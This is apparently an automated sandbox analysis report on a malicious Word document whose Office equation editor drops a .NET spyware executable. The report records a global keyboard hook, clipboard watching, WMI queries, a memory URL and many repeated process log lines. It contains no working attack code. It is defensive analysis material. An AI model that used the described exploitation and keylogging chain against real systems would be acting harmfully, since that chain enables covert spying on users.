              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350007415.0000000002B13000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350002166.0000000002B0F000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmpString found in binary or memory: https://xWUrFiDn0aBmFXBFM.net

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Installs a global keyboard hookShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b3DA6FFF0u002d7A4Cu002d4354u002dA44Au002d80CFFE9AEF36u007d/C8F0ECA3u002d36A1u002d4690u002d8D13u002d6EC07C1D3DE8.csLarge array initialization: .cctor: array initializer size 11944
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 4_2_011E415D4_2_011E415D
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 5_2_011E415D5_2_011E415D
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_004022966_2_00402296
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_002253306_2_00225330
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_002263486_2_00226348
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_0022CB506_2_0022CB50
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_002220896_2_00222089
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_002256786_2_00225678
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$nding Orders Statement -40064778.docJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC34.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Pending Orders Statement -40064778.docVirustotal: Detection: 41%
              Source: Pending Orders Statement -40064778.docReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
              Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
